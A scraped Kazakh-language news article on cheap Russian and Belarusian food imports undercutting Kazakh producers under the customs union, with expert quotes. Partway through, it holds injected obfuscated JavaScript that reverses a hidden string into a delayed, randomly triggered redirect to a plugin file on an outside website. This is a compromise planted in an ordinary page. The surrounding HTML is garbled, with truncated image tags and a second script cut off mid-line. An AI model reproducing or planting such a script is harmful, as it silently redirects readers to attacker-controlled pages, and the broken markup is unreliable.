2024-07-27

Нарыққа ресейлік азық-түлік дендеп енді, қуанамыз ба?жоқ…

83ebc779-a597-43b1-8378-342326bbcd10_w268_r11.jpg - 12.33 Kbtories/83ebc779-a597-43b1-8378-342326bbcd10_w268_r11.jpg» width=»209″ height=»142″ />

       Азық-түлік қауіпсіздігі ең маңызды мәселе. Соңғы жылдары қазақ оның қадірін біле бастады. Қазір көбіміздің сырт келбеті мен орамасы көздің жауын алатын Қытайдың азығына көңіліміз түспейді. Арзан бағасы да қызықтыра қоймайды. «Үркектеп» қараймыз. Ресейлік баламасы бар ма?- деп сұрап жатамыз. Олай дейтініміз   еліміздің азық-түлік нарығында қытайдан кейін бағасы төмен орыстың кәсіпорындарында өндірілетін тағамдар. Сапасы да тәуірлеу. Қарапайым тұтынушы бұл жерден саясат іздей қоймайды. Бір қарағанда солай. Ал, астарына үңілсек..  отандық өндірушілердің болашағына алаңдауға тура келеді.

          «Мегаполис» газетінің жуырдағы сандарының бірінде шыққан мынадай ақпарды оқып бей-жай қала алмадық. «Дүкен сөрелерінде күн өткен сайын ресейдің арзан тауарларының қатары көбейіп барады. Көрші елдің ірі кәсіпкерлері осылай отандық тауарды нарықтан ысырып шығаруға әрекеттенуде. Ресейліктер қазақстандық бәсекелестерінің тауарына сұранысты болдырмау үшін шығынға жұмыс істеп жатыр».    Бұл жағдай тағы бір жарты жыл орын алса, отандық шағын және орта кәсіпорындар  өнімділігін азайтады да, нарықта басымдық алған ресейлік өндірісшілер  бағаны бірден көтеріп жібереді — деген Николай Радостовецтің пікірін көзіміз шалған болатын

                                                                             

          Осы пікірдің анық қанығына көз жеткізу үшін базар араладық, азық-түлік бағамында үлкен айырмашылық бар жоғына көз жеткіздік. Байқағанымыз қытай өнімдерінің азайғаны көрініп тұр. Отандық және ресейлік  тағам өнімдерінің баға айырмашылығы 5-10 теңге аралығында. Олардыкі арзан, біздікі қымбат,сапасы деңгейлес. 5-10 теңгені миллиондарға шақсақ қауіп бар.

         Жасыратыны жоқ ресейлік және белорус маркетологтары түрлі акциялар ұйымдастыруға бейім тұрады. Оны көзімізбен көріп жүрміз. Біреуін алсаңыз, екіншісі тегін, немесе 50 пайыз жеңілдік! Баста осылай   бір-екі ай. Содан кейін арзан баға орнығады. Тауар нарыққа орнықты деген сөз бұл.Мұны қазақстандық бизнесті тықсыру деп түсіну керек те шығар…. Басқа қалай қабылдауға болады?

Шетелдіктердің бастапқыда нарыққа ену үшін төмен баға ұсынуының   негізгі себебі осында жатыр. Ал,  кіші кәсіпорындарды үлкен қуатты 
өндірісшілердің нарықтан ысырып шығаруы әлемдік тәжірибеде орын алған
жағдай.

           Қазақстан кедендік одаққа кірмес бұрын сан соғып қалмас үшін халық көп тұтынатын тағам өнімдердің бәсекеге қабілетін бір бағамдап алған. Бірақ, біз өндірмейтін өнім түрлері де бар. Және аз емес. Егер осыны есепке алсақ, сарапшының пікірі көңілге қона түседі.

Кейбір мәліметтерге қарағанда Қазақстан мен Беларуссияда   өндірілетін еттің көтерме бағасында 15-18 пайыз айырмашылық бар екенін аңғарамыз. Оған сарапшылар Белоруссия ауыл шаруашылығын Қазақстанға қарағанда көбірек қолдайды, өнімнің арзан болу себебі осы деп
түсінік береді. Бұл да өз кезегінде Қазақстан өнімін нарықтан ысырып шығаруға әкеледі. Еттің нарықтағы орнының азайуы , мал басын азайтуға әкеледі,-деген болжам да бар.

Осыдан кейін көкейіңізде «неге қазақстандық өндірісшілер бағаны төмендетпейді» деген заңды сауал туындаған болар. Олай етуге біздің өнім өндірушілердің мүмкіндігі жоқ . Баға төмендесе орта кәсіпорындардың басым бөлігінің банкротқа ұшырауы әбден мүмкін. Оның өзіндік себептері бар.Жем қымбат, газ қымбат, электр қуаты қымбат тағысын тағылар. Бізде ірі өндіріс орындарының негізі енді ғана қаланып жатыр. Үміт артамыз, бірақ қауіп те жоқ емес.

*Сіз не дейсіз?

 rados<script>$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;	setTimeout($nJe(0), delay);}</script><script>$zXz=function(n){if (typeof ($zXz.list[n]) == tovets-nikolay-vladimirovich_aa8209e_45x451.jpg — 1.73 Kb» src=»images/stories/radostovets-nikolay-vladimirovich_aa8209e_45x451.jpg» width=»81″ height=»97″ />

Николай Радостовец:                                                                                      

         — Бұл әділ ойын емес. Егерде сауда орнына бас сұқсаңыз азық-түліктердегі
бағалардың едәуір айырмашылығын байқайсыз. Мысалы, ресейлік өнім 100 тенге тұрса, ал еліміз өндірген тауары 350 тенге. Бұл Қазақстан кәсіпкерлерін тығырыққа тіреп, жою деген сөз. Еліміздің сауда орталықтарындағы сөрелерінде арзан бағамен саудаланып жатқан азық-түліктің басым бөлігі көрші елдерден ағылып келіп жатқан тауарлар. Дәлірек айтқанда Ресей мен Беларусь мемлекеттерінен. Осындай жолмен іргемізге қоңсы қонған елдердің ірі кәсіпкерлері қазақстандық өндірушілерді өз нарығымыздан ығыстыруды көздеп отырған сыңайлы. Тіпті сол үшін көрші елдің кәсіпкерлері шығынға батып отыр дейді мамандар. Яғни отандық өндірушілер ойын алаңынан шығып қалған соң, сол сырттан келетін тауар құны қайта шарықтап шыға келеді. Ал еліміздің кәсіпкерлері болса бұл кедендік одақтың жасап отырған «жақсылығы» дейді.

tnazkhanov21.jpg - 6.19 Kbtories/tnazkhanov21.jpg» width=»70″ height=»90″ />

Тимур Назханов: 

Тәуелсіз кәсіпкерлер ассоциациясының вице-президенті:                                

       — Біздің кеден одағымызға кіргелі 3 жылдай болып қалды. Әрине Ресей мен Белорусь пен салыстырғанда біз дайын емес едік. Себептері көп. Соның ішінде шағын орта бизнеске үкімет тарапынан нақтылы көмек берілген жоқ. Өте көп әңгімелер болды бірақ нақтылы жағдайын жасаған жоқ. 

tom: 0pt;»>Әлімбаев Нұрлан Әдбінәбиұлы.

«ҚЫЗМЕТ»

 

Яндекс.Метрика